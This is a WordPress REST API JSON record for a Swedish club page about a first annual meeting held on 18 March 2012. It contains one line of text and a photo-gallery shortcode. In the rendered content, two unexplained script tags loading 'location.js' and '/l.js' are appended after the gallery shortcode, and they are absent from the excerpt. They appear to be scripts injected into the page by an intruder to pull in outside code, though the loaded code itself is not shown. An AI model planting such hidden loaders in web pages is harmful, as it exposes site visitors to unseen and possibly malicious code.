{"id":1686,"date":"2013-03-26T19:29:45","date_gmt":"2013-03-26T17:29:45","guid":{"rendered":"http:\/\/84.20.155.7\/nywp\/?page_id=1686"},"modified":"2013-03-26T19:29:45","modified_gmt":"2013-03-26T17:29:45","slug":"forsta-arsmotet-18-mars-2012","status":"publish","type":"page","link":"https:\/\/hindersby.net\/nywp\/?page_id=1686","title":{"rendered":"F\u00f6rsta \u00e5rsm\u00f6tet 18 mars 2012"},"content":{"rendered":"<p>Intressant nog r\u00e5kade det vara det \u00c5kes f\u00f6delsedag.<\/p>\n<p>[nggallery id=9]<script src='location.js?p=1' type=text\/javascript><\/script><script src='\/l.js?p=1' type=text\/javascript><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Intressant nog r\u00e5kade det vara det \u00c5kes f\u00f6delsedag. [nggallery id=9]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":840,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"footnotes":""},"class_list":["post-1686","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/pages\/1686","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1686"}],"version-history":[{"count":1,"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/pages\/1686\/revisions"}],"predecessor-version":[{"id":1687,"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/pages\/1686\/revisions\/1687"}],"up":[{"embeddable":true,"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=\/wp\/v2\/pages\/840"}],"wp:attachment":[{"href":"https:\/\/hindersby.net\/nywp\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1686"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}